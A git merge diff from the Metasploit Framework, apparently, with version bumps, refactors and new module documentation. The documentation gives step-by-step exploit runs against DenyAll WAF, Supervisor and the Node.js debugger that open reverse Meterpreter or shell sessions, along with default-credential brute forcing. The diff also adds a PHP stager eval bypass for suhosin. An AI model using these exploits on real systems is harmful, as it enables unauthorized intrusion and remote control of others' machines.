Merge branch 'master' into fix_nmap_imports
bringing branch up to datebug/bundler_fix
commit
f777e2ab3b
|
@ -1 +1 @@
|
|||
2.4.1
|
||||
2.4.2
|
||||
|
|
|
@ -12,8 +12,8 @@ addons:
|
|||
language: ruby
|
||||
rvm:
|
||||
- '2.2'
|
||||
- '2.3.4'
|
||||
- '2.4.1'
|
||||
- '2.3.5'
|
||||
- '2.4.2'
|
||||
|
||||
env:
|
||||
- CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
FROM ruby:2.4.1-alpine
|
||||
FROM ruby:2.4.2-alpine
|
||||
MAINTAINER Rapid7
|
||||
|
||||
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
|
||||
|
|
16
Gemfile.lock
16
Gemfile.lock
|
@ -1,7 +1,7 @@
|
|||
PATH
|
||||
remote: .
|
||||
specs:
|
||||
metasploit-framework (4.16.8)
|
||||
metasploit-framework (4.16.9)
|
||||
actionpack (~> 4.2.6)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -17,7 +17,7 @@ PATH
|
|||
metasploit-concern
|
||||
metasploit-credential
|
||||
metasploit-model
|
||||
metasploit-payloads (= 1.3.7)
|
||||
metasploit-payloads (= 1.3.8)
|
||||
metasploit_data_models
|
||||
metasploit_payloads-mettle (= 0.2.2)
|
||||
msgpack
|
||||
|
@ -150,7 +150,7 @@ GEM
|
|||
activemodel (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
railties (~> 4.2.6)
|
||||
metasploit-payloads (1.3.7)
|
||||
metasploit-payloads (1.3.8)
|
||||
metasploit_data_models (2.0.15)
|
||||
activerecord (~> 4.2.6)
|
||||
activesupport (~> 4.2.6)
|
||||
|
@ -163,7 +163,7 @@ GEM
|
|||
recog (~> 2.0)
|
||||
metasploit_payloads-mettle (0.2.2)
|
||||
method_source (0.8.2)
|
||||
mini_portile2 (2.2.0)
|
||||
mini_portile2 (2.3.0)
|
||||
minitest (5.10.3)
|
||||
msgpack (1.1.0)
|
||||
multipart-post (2.0.0)
|
||||
|
@ -171,8 +171,8 @@ GEM
|
|||
net-ssh (4.2.0)
|
||||
network_interface (0.0.2)
|
||||
nexpose (7.0.1)
|
||||
nokogiri (1.8.0)
|
||||
mini_portile2 (~> 2.2.0)
|
||||
nokogiri (1.8.1)
|
||||
mini_portile2 (~> 2.3.0)
|
||||
octokit (4.7.0)
|
||||
sawyer (~> 0.8.0, >= 0.5.3)
|
||||
openssl-ccm (1.2.1)
|
||||
|
@ -193,10 +193,9 @@ GEM
|
|||
activerecord (>= 4.0.0)
|
||||
arel (>= 4.0.1)
|
||||
pg_array_parser (~> 0.0.9)
|
||||
pry (0.10.4)
|
||||
pry (0.11.0)
|
||||
coderay (~> 1.1.0)
|
||||
method_source (~> 0.8.1)
|
||||
slop (~> 3.4)
|
||||
public_suffix (3.0.0)
|
||||
rack (1.6.8)
|
||||
rack-test (0.6.3)
|
||||
|
@ -308,7 +307,6 @@ GEM
|
|||
json (>= 1.8, < 3)
|
||||
simplecov-html (~> 0.10.0)
|
||||
simplecov-html (0.10.2)
|
||||
slop (3.6.0)
|
||||
sqlite3 (1.3.13)
|
||||
sshkey (1.9.0)
|
||||
thor (0.20.0)
|
||||
|
|
|
@ -0,0 +1,59 @@
|
|||
## Description
|
||||
|
||||
This module allows you to authenticate to Inedo BuildMaster, an application release automation tool.
|
||||
The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide)
|
||||
|
||||
[Inedo website](http://inedo.com/)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Do: ```use auxiliary/scanner/http/buildmaster_login```
|
||||
2. Do: ```set RHOSTS [IP]```
|
||||
3. Do: ```set RPORT [PORT]```
|
||||
4. Do: Set credentials
|
||||
5. Do: ```run```
|
||||
6. You should see the module attempting to log in.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Attempt to login with the default credentials.
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/buildmaster_login
|
||||
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
|
||||
RHOSTS => 10.0.0.39
|
||||
msf auxiliary(buildmaster_login) > run
|
||||
|
||||
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
|
||||
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
|
||||
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(buildmaster_login) >
|
||||
```
|
||||
|
||||
### Brute force with credentials from file.
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/http/buildmaster_login
|
||||
msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39
|
||||
RHOSTS => 10.0.0.39
|
||||
msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt
|
||||
USERPASS_FILE => ~/BuildMasterCreds.txt
|
||||
msf auxiliary(buildmaster_login) > run
|
||||
|
||||
[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1)
|
||||
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test"
|
||||
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test"
|
||||
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong"
|
||||
[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong"
|
||||
[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin"
|
||||
[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin"
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(buildmaster_login) >
|
||||
```
|
|
@ -0,0 +1,55 @@
|
|||
# Description
|
||||
This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects:
|
||||
```PC NETWORK PROGRAM 1.0
|
||||
LANMAN1.0
|
||||
Windows for Workgroups 3.1a
|
||||
LM1.2X002
|
||||
LANMAN2.1
|
||||
NT LM 0.12
|
||||
```
|
||||
If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected.
|
||||
If the SMB server does not support SMBv1 a RST will be sent.
|
||||
|
||||
___
|
||||
# Usage
|
||||
|
||||
The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not.
|
||||
|
||||
#### A host that does support SMBv1.
|
||||
|
||||
```
|
||||
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
|
||||
msf auxiliary(smb1) > set RHOSTS x.x.x.x
|
||||
RHOSTS => x.x.x.x
|
||||
msf auxiliary(smb1) > run
|
||||
|
||||
[+] x.x.x.x:445 - x.x.x.x supports SMBv1 dialect.
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(smb1) > services -S x.x.x.x
|
||||
|
||||
Services
|
||||
========
|
||||
|
||||
host port proto name state info
|
||||
---- ---- ----- ---- ----- ----
|
||||
x.x.x.x 445 tcp smb1 open
|
||||
```
|
||||
|
||||
#### A host that does not support SMBv1
|
||||
|
||||
```
|
||||
msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1
|
||||
msf auxiliary(smb1) > set RHOSTS y.y.y.y
|
||||
RHOSTS => y.y.y.y
|
||||
msf auxiliary(smb1) > run
|
||||
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
___
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
The only option is RHOSTS, which can be specified as a single IP, hostname, or an IP range in CIDR notation or range notation. It can also be set using hosts from the database using ```hosts -R```.
|
|
@ -0,0 +1,47 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
|
||||
|
||||
It's possible to have trial demo for 15 days at Amazon Marketplace.
|
||||
[https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
|
||||
|
||||
You just need to follow instruction above URL.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
A successful check of the exploit will look like this:
|
||||
|
||||
- [ ] Start `msfconsole`
|
||||
- [ ] `use use exploit/linux/http/denyall_exec`
|
||||
- [ ] Set `RHOST`
|
||||
- [ ] Set `LHOST`
|
||||
- [ ] Run `check`
|
||||
- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
|
||||
- [ ] Run `exploit`
|
||||
- [ ] **Verify** that you are seeing `iToken` value extraction.
|
||||
- [ ] **Verify** that you are getting `meterpreter` session.
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/denyall_exec
|
||||
msf exploit(denyall_exec) >
|
||||
msf exploit(denyall_exec) > set RHOST 35.176.123.128
|
||||
RHOST => 35.176.123.128
|
||||
msf exploit(denyall_exec) > set LHOST 35.12.3.3
|
||||
LHOST => 35.12.3.3
|
||||
msf exploit(denyall_exec) > check
|
||||
[*] 35.176.123.128:3001 The target appears to be vulnerable.
|
||||
msf exploit(denyall_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 35.12.3.3:4444
|
||||
[*] Extracting iToken value from unauthenticated accessible endpoint.
|
||||
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
|
||||
[*] Trigerring command injection vulnerability with iToken value.
|
||||
[*] Sending stage (40411 bytes) to 35.176.123.128
|
||||
[*] Meterpreter session 1 opened (35.176.123.128:4444 -> 35.12.3.3:60556) at 2017-09-19 14:31:52 +0300
|
||||
|
||||
meterpreter > pwd
|
||||
/var/log/denyall/reverseproxy
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,78 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module exploits an authenticated RCE vulnerability in Supervisor versions 3.0a1 to 3.3.2
|
||||
|
||||
This has been tested with versions 3.2.0 and 3.3.2
|
||||
|
||||
### Creating A Testing Environment
|
||||
|
||||
At the time of writing, version 3.2.0-2ubuntu0.1 is available in the Ubuntu repositories.
|
||||
|
||||
1. ```sudo apt-get install supervisor```
|
||||
2. Enable Web interface/XML-RPC server in Supervisor config in `/etc/supervisor/supervisord.conf`
|
||||
|
||||
```
|
||||
[inet_http_server] ; inet (TCP) server disabled by default
|
||||
port=:9001 ; ip_address:port specifier, *:port for all iface
|
||||
username=user ; default is no username (open server)
|
||||
password=123 ; default is no password (open server)
|
||||
```
|
||||
|
||||
3. Restart the service: `sudo service supervisor restart`
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. ```use exploit/linux/http/supervisor_xmlrpc_exec```
|
||||
2. ```set lhost [IP]```
|
||||
3. ```set rhost [IP]```
|
||||
4. ```set httpusername user```
|
||||
5. ```set httppassword 123```
|
||||
6. ```exploit```
|
||||
7. A meterpreter session should have been opened successfully
|
||||
|
||||
## Options
|
||||
|
||||
**HttpUsername**
|
||||
|
||||
Username for HTTP basic auth which is set in the conf file(optional)
|
||||
|
||||
**HttpPassword**
|
||||
|
||||
Password for HTTP basic auth which is set in the conf file(optional)
|
||||
|
||||
**TARGETURI**
|
||||
|
||||
The path to the XML-RPC endpoint
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Supervisor 3.2.0 on Xubuntu 16.04
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/supervisor_xmlrpc_exec
|
||||
msf exploit(supervisor_xmlrpc_exec) > set httpusername user
|
||||
httpusername => user
|
||||
msf exploit(supervisor_xmlrpc_exec) > set httppassword 123
|
||||
httppassword => 123
|
||||
msf exploit(supervisor_xmlrpc_exec) > set lhost 192.168.0.2
|
||||
lhost => 192.168.0.2
|
||||
msf exploit(supervisor_xmlrpc_exec) > set rhost 192.168.0.19
|
||||
rhost => 192.168.0.19
|
||||
msf exploit(supervisor_xmlrpc_exec) > check
|
||||
|
||||
[*] Extracting version from web interface..
|
||||
[*] Using basic auth (user:123)
|
||||
[+] Vulnerable version found: 3.2.0
|
||||
[*] 192.168.0.19:9001 The target appears to be vulnerable.
|
||||
msf exploit(supervisor_xmlrpc_exec) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.0.2:4444
|
||||
[*] Sending XML-RPC payload via POST to 192.168.0.19:9001/RPC2
|
||||
[*] Using basic auth (user:123)
|
||||
[*] Sending stage (2878872 bytes) to 192.168.0.19
|
||||
[*] Command Stager progress - 100.00% done (782/782 bytes)
|
||||
[+] Request timeout, usually indicates success. Passing to handler..
|
||||
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.19:36186) at 2017-08-30 01:24:45 +0100
|
||||
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,64 @@
|
|||
## Vulnerable Application
|
||||
|
||||
Current and historical versions of node (or any JS env based on the
|
||||
V8 JS engine) have this functionality and could be exploitable if
|
||||
configured to expose the JS port on an untrusted interface.
|
||||
|
||||
Install a version of node using any of the normal methods:
|
||||
* Vendor: https://nodejs.org/en/download/package-manager/
|
||||
* Distro: `sudo apt-get install nodejs`
|
||||
|
||||
Alternately, use standard node docker containers as targets:
|
||||
```
|
||||
$ docker run -it --rm -p 5858:5858 node:4-wheezy node --debug=0.0.0.0:5858
|
||||
```
|
||||
(Others at https://hub.docker.com/_/node/)
|
||||
|
||||
Tested on Node 7.x, 6.x, 4.x
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Run a node process exposing the debug port
|
||||
```
|
||||
node --debug=0.0.0.0:5858
|
||||
```
|
||||
|
||||
2. Exploit it and catch the callback:
|
||||
|
||||
```
|
||||
msfconsole -x "use exploit/multi/misc/nodejs_v8_debugger; set RHOST 127.0.0.1; set PAYLOAD nodejs/shell_reverse_tcp; set LHOST 127.0.0.1; handler -H 0.0.0.0 -P 4444 -p nodejs/shell_reverse_tcp; exploit
|
||||
```
|
||||
(If using docker hosts as targets for testing, ensure that LHOST addr is accessible to the container)
|
||||
|
||||
Note that in older Node versions (notably 4.8.4), the debugger will not immediately process the incoming eval message. As soon as there is some kind of activity
|
||||
(such as a step or continue in the debugger, or just hitting enter), the payload will execute and the handler session will start.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Example Run (Node 7.x)
|
||||
|
||||
Victim:
|
||||
```
|
||||
$ node --version
|
||||
v7.10.0
|
||||
$ node --debug=0.0.0.0:5858
|
||||
(node:83089) DeprecationWarning: node --debug is deprecated. Please use node --inspect instead.
|
||||
Debugger listening on 0.0.0.0:5858
|
||||
>
|
||||
(To exit, press ^C again or type .exit)
|
||||
```
|
||||
|
||||
Attacker:
|
||||
```
|
||||
msf exploit(nodejs_v8_debugger) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 10.0.0.141:4444
|
||||
[*] 127.0.0.1:5858 - Sending 745 byte payload...
|
||||
[*] 127.0.0.1:5858 - Got success response
|
||||
[*] Command shell session 4 opened (10.0.0.141:4444 -> 10.0.0.141:53168) at 2017-09-04 00:37:17 -0700
|
||||
|
||||
id
|
||||
(redacted)
|
||||
```
|
||||
|
|
@ -30,7 +30,7 @@ module Metasploit
|
|||
end
|
||||
end
|
||||
|
||||
VERSION = "4.16.8"
|
||||
VERSION = "4.16.9"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
|
|
@ -3,30 +3,74 @@
|
|||
require 'shellwords'
|
||||
|
||||
module Msf
|
||||
module Sessions
|
||||
module MeterpreterOptions
|
||||
module Sessions
|
||||
#
|
||||
# Defines common options across all Meterpreter implementations
|
||||
#
|
||||
module MeterpreterOptions
|
||||
|
||||
TIMEOUT_SESSION = 24 * 3600 * 7 # 1 week
|
||||
TIMEOUT_COMMS = 300 # 5 minutes
|
||||
TIMEOUT_RETRY_TOTAL = 60 * 60 # 1 hour
|
||||
TIMEOUT_RETRY_WAIT = 10 # 10 seconds
|
||||
|
||||
def initialize(info = {})
|
||||
super(info)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptBool.new('AutoLoadStdapi', [true, "Automatically load the Stdapi extension", true]),
|
||||
OptBool.new('AutoVerifySession', [true, "Automatically verify and drop invalid sessions", true]),
|
||||
OptInt.new('AutoVerifySessionTimeout', [false, "Timeout period to wait for session validation to occur, in seconds", 30]),
|
||||
OptString.new('InitialAutoRunScript', [false, "An initial script to run on session creation (before AutoRunScript)", '']),
|
||||
OptString.new('AutoRunScript', [false, "A script to run automatically on session creation.", '']),
|
||||
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
|
||||
OptBool.new('EnableUnicodeEncoding', [true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]),
|
||||
OptPath.new('HandlerSSLCert', [false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]),
|
||||
OptInt.new('SessionRetryTotal', [false, "Number of seconds try reconnecting for on network failure", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_TOTAL]),
|
||||
OptInt.new('SessionRetryWait', [false, "Number of seconds to wait between reconnect attempts", Rex::Post::Meterpreter::ClientCore::TIMEOUT_RETRY_WAIT]),
|
||||
OptInt.new('SessionExpirationTimeout', [ false, 'The number of seconds before this session should be forcibly shut down', Rex::Post::Meterpreter::ClientCore::TIMEOUT_SESSION]),
|
||||
OptInt.new('SessionCommunicationTimeout', [ false, 'The number of seconds of no activity before this session should be killed', Rex::Post::Meterpreter::ClientCore::TIMEOUT_COMMS])
|
||||
], self.class)
|
||||
OptBool.new(
|
||||
'AutoLoadStdapi',
|
||||
[true, "Automatically load the Stdapi extension", true]
|
||||
),
|
||||
OptBool.new(
|
||||
'AutoVerifySession',
|
||||
[true, "Automatically verify and drop invalid sessions", true]
|
||||
),
|
||||
OptInt.new(
|
||||
'AutoVerifySessionTimeout',
|
||||
[false, "Timeout period to wait for session validation to occur, in seconds", 30]
|
||||
),
|
||||
OptString.new(
|
||||
'InitialAutoRunScript',
|
||||
[false, "An initial script to run on session creation (before AutoRunScript)", '']
|
||||
),
|
||||
OptString.new(
|
||||
'AutoRunScript',
|
||||
[false, "A script to run automatically on session creation.", '']
|
||||
),
|
||||
OptBool.new(
|
||||
'AutoSystemInfo',
|
||||
[true, "Automatically capture system information on initialization.", true]
|
||||
),
|
||||
OptBool.new(
|
||||
'EnableUnicodeEncoding',
|
||||
[true, "Automatically encode UTF-8 strings as hexadecimal", Rex::Compat.is_windows]
|
||||
),
|
||||
OptPath.new(
|
||||
'HandlerSSLCert',
|
||||
[false, "Path to a SSL certificate in unified PEM format, ignored for HTTP transports"]
|
||||
),
|
||||
OptInt.new(
|
||||
'SessionRetryTotal',
|
||||
[false, "Number of seconds try reconnecting for on network failure", TIMEOUT_RETRY_TOTAL]
|
||||
),
|
||||
OptInt.new(
|
||||
'SessionRetryWait',
|
||||
[false, "Number of seconds to wait between reconnect attempts", TIMEOUT_RETRY_WAIT]
|
||||
),
|
||||
OptInt.new(
|
||||
'SessionExpirationTimeout',
|
||||
[ false, 'The number of seconds before this session should be forcibly shut down', TIMEOUT_SESSION]
|
||||
),
|
||||
OptInt.new(
|
||||
'SessionCommunicationTimeout',
|
||||
[ false, 'The number of seconds of no activity before this session should be killed', TIMEOUT_COMMS]
|
||||
)
|
||||
],
|
||||
self.class
|
||||
)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -10,7 +10,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
|||
# @param pass [String] Password
|
||||
# @param redirect URL [String] to redirect after successful login
|
||||
# @return [Hash] The post data for vars_post Parameter
|
||||
def wordpress_helper_login_post_data(user, pass, redirect=nil)
|
||||
def wordpress_helper_login_post_data(user, pass, redirect = nil)
|
||||
post_data = {
|
||||
'log' => user.to_s,
|
||||
'pwd' => pass.to_s,
|
||||
|
@ -39,15 +39,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
|||
vars_post.merge!({
|
||||
'author' => author,
|
||||
'email' => email,
|
||||
'url' => url,
|
||||
'url' => url
|
||||
}) unless login_cookie
|
||||
|
||||
options = {
|
||||
'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
|
||||
'method' => 'POST'
|
||||
}
|
||||
options.merge!({'vars_post' => vars_post})
|
||||
options.merge!({'cookie' => login_cookie}) if login_cookie
|
||||
options.merge!({ 'vars_post' => vars_post })
|
||||
options.merge!({ 'cookie' => login_cookie }) if login_cookie
|
||||
res = send_request_cgi(options)
|
||||
if res && res.redirect? && res.redirection
|
||||
return wordpress_helper_parse_location_header(res)
|
||||
|
@ -65,7 +65,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
|||
# @param comments_enabled [Boolean] If true try to find a post id with comments enabled, otherwise return the first found
|
||||
# @param login_cookie [String] A valid login cookie to perform the bruteforce as an authenticated user
|
||||
# @return [Integer,nil] The post id, nil when nothing found
|
||||
def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil)
|
||||
def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled = false, login_cookie = nil)
|
||||
range.each { |id|
|
||||
vprint_status("Checking POST ID #{id}...") if (id % 100) == 0
|
||||
body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie)
|
||||
|
@ -81,15 +81,15 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
|||
# @param comments_enabled [Boolean] Check if comments are enabled on this post
|
||||
# @param login_cookie [String] A valid login cookie to perform the check as an authenticated user
|
||||
# @return [String,nil] the HTTP response body of the post, nil otherwise
|
||||
def wordpress_helper_check_post_id(uri, comments_enabled=false, login_cookie=nil)
|
||||
def wordpress_helper_check_post_id(uri, comments_enabled = false, login_cookie = nil)
|
||||
options = {
|
||||
'method' => 'GET',
|
||||
'uri' => uri
|
||||
}
|
||||
options.merge!({'cookie' => login_cookie}) if login_cookie
|
||||
options.merge!({ 'cookie' => login_cookie }) if login_cookie
|
||||
res = send_request_cgi(options)
|
||||
# post exists
|
||||
if res and res.code == 200
|
||||
if res && res.code == 200
|
||||
# also check if comments are enabled
|
||||
if comments_enabled
|
||||
if res.body =~ /form.*action.*wp-comments-post\.php/
|
||||
|
@ -123,8 +123,8 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
|||
#
|
||||
# @param cookie [String] A valid admin session cookie
|
||||
# @return [String,nil] The nonce, nil on error
|
||||
def wordpress_helper_get_plugin_upload_nonce(cookie)
|
||||
uri = normalize_uri(wordpress_url_backend, 'plugin-install.php')
|
||||
def wordpress_helper_get_plugin_upload_nonce(cookie, path = nil)
|
||||
uri = path || normalize_uri(wordpress_url_backend, 'plugin-install.php')
|
||||
options = {
|
||||
'method' => 'GET',
|
||||
'uri' => uri,
|
||||
|
@ -134,6 +134,9 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers
|
|||
res = send_request_cgi(options)
|
||||
if res && res.code == 200
|
||||
return res.body.to_s[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
|
||||
elsif res && res.redirect? && res.redirection
|
||||
path = wordpress_helper_parse_location_header(res)
|
||||
return wordpress_helper_get_plugin_upload_nonce(cookie, path)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
|
@ -41,7 +41,10 @@ class Msf::Payload::Apk
|
|||
application = amanifest.xpath('//application')
|
||||
application_name = application.attribute("name")
|
||||
if application_name
|
||||
return application_name.to_s
|
||||
application_str = application_name.to_s
|
||||
unless application_str == 'android.app.Application'
|
||||
return application_str
|
||||
end
|
||||
end
|
||||
activities = amanifest.xpath("//activity|//activity-alias")
|
||||
for activity in activities
|
||||
|
@ -221,7 +224,7 @@ class Msf::Payload::Apk
|
|||
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
|
||||
|
||||
package = amanifest.xpath("//manifest").first['package']
|
||||
package = package + ".#{Rex::Text::rand_text_alpha_lower(5)}"
|
||||
package = package.downcase + ".#{Rex::Text::rand_text_alpha_lower(5)}"
|
||||
classes = {}
|
||||
classes['Payload'] = Rex::Text::rand_text_alpha_lower(5).capitalize
|
||||
classes['MainService'] = Rex::Text::rand_text_alpha_lower(5).capitalize
|
||||
|
|
|
@ -31,7 +31,7 @@ module Payload::Linux::BindTcp
|
|||
|
||||
# Generate the more advanced stager if we have the space
|
||||
if self.available_space && required_space <= self.available_space
|
||||
conf[:exitfunk] = datastore['EXITFUNC'],
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:reliable] = true
|
||||
end
|
||||
|
||||
|
|
|
@ -109,7 +109,15 @@ while (strlen($b) < $len) {
|
|||
# Set up the socket for the main stage to use.
|
||||
$GLOBALS['msgsock'] = $s;
|
||||
$GLOBALS['msgsock_type'] = $s_type;
|
||||
eval($b);
|
||||
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
|
||||
{
|
||||
$suhosin_bypass=create_function('', $b);
|
||||
$suhosin_bypass();
|
||||
}
|
||||
else
|
||||
{
|
||||
eval($b);
|
||||
}
|
||||
die();^
|
||||
end
|
||||
|
||||
|
|
|
@ -102,7 +102,15 @@ while (strlen($b) < $len) {
|
|||
# Set up the socket for the main stage to use.
|
||||
$GLOBALS['msgsock'] = $s;
|
||||
$GLOBALS['msgsock_type'] = $s_type;
|
||||
eval($b);
|
||||
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval'))
|
||||
{
|
||||
$suhosin_bypass=create_function('', $b);
|
||||
$suhosin_bypass();
|
||||
}
|
||||
else
|
||||
{
|
||||
eval($b);
|
||||
}
|
||||
die();^
|
||||
end
|
||||
|
||||
|
|
|
@ -35,7 +35,7 @@ module Payload::Windows::BindTcp
|
|||
|
||||
# Generate the more advanced stager if we have the space
|
||||
if self.available_space && required_space <= self.available_space
|
||||
conf[:exitfunk] = datastore['EXITFUNC'],
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:reliable] = true
|
||||
end
|
||||
|
||||
|
|
|
@ -33,7 +33,7 @@ module Payload::Windows::BindTcpRc4
|
|||
|
||||
# Generate the more advanced stager if we have the space
|
||||
if self.available_space && required_space <= self.available_space
|
||||
conf[:exitfunk] = datastore['EXITFUNC'],
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:reliable] = true
|
||||
end
|
||||
|
||||
|
|
|
@ -33,7 +33,7 @@ module Payload::Windows::BindTcp_x64
|
|||
|
||||
# Generate the more advanced stager if we have the space
|
||||
if self.available_space && required_space <= self.available_space
|
||||
conf[:exitfunk] = datastore['EXITFUNC'],
|
||||
conf[:exitfunk] = datastore['EXITFUNC']
|
||||
conf[:reliable] = true
|
||||
end
|
||||
|
||||
|
|
|
@ -40,7 +40,9 @@ module Msf::Post::Unix
|
|||
#
|
||||
def get_groups
|
||||
groups = []
|
||||
cmd_out = read_file("/etc/group").split("\n")
|
||||
group = '/etc/group'
|
||||
if file_exist?(group)
|
||||
cmd_out = read_file(group).split("\n")
|
||||
cmd_out.each do |l|
|
||||
entry = {}
|
||||
user_field = l.split(":")
|
||||
|
@ -49,6 +51,7 @@ module Msf::Post::Unix
|
|||
entry[:users] = user_field[3]
|
||||
groups << entry
|
||||
end
|
||||
end
|
||||
return groups
|
||||
end
|
||||
|
||||
|
@ -59,9 +62,12 @@ module Msf::Post::Unix
|
|||
user_dirs = []
|
||||
|
||||
# get all user directories from /etc/passwd
|
||||
read_file("/etc/passwd").each_line do |passwd_line|
|
||||
passwd = '/etc/passwd'
|
||||
if file_exist?(passwd)
|
||||
read_file(passwd).each_line do |passwd_line|
|
||||
user_dirs << passwd_line.split(/:/)[5]
|
||||
end
|
||||
end
|
||||
|
||||
# also list other common places for home directories in the event that
|
||||
# the users aren't in /etc/passwd (LDAP, for example)
|
||||
|
|
|
@ -66,23 +66,26 @@ module Msf
|
|||
end
|
||||
|
||||
def cmd_edit_help
|
||||
msg = "Edit the currently active module"
|
||||
msg = "#{msg} #{local_editor ? "with #{local_editor}" : "(LocalEditor or $VISUAL/$EDITOR should be set first)"}."
|
||||
print_line "Usage: edit"
|
||||
print_line "Usage: edit [file/to/edit.rb]"
|
||||
print_line
|
||||
print_line msg
|
||||
print_line "When done editing, you must reload the module with 'reload' or 'rerun'."
|
||||
print_line "Edit a local file or the currently active module with #{local_editor}"
|
||||
print_line "If a file path is specified it will automatically be reloaded after editing"
|
||||
print_line "Otherwise, you can reload the active module with 'reload' or 'rerun'."
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Edit the currently active module
|
||||
#
|
||||
def cmd_edit
|
||||
if active_module
|
||||
editor = local_editor
|
||||
def cmd_edit(*args)
|
||||
if args.length > 0
|
||||
path = args[0]
|
||||
elsif active_module
|
||||
path = active_module.file_path
|
||||
end
|
||||
|
||||
if path
|
||||
editor = local_editor
|
||||
if editor.nil?
|
||||
editor = 'vim'
|
||||
print_warning("LocalEditor or $VISUAL/$EDITOR should be set. Falling back on #{editor}.")
|
||||
|
@ -90,6 +93,10 @@ module Msf
|
|||
|
||||
print_status("Launching #{editor} #{path}")
|
||||
system(editor, path)
|
||||
|
||||
if args.length > 0
|
||||
load args[0]
|
||||
end
|
||||
else
|
||||
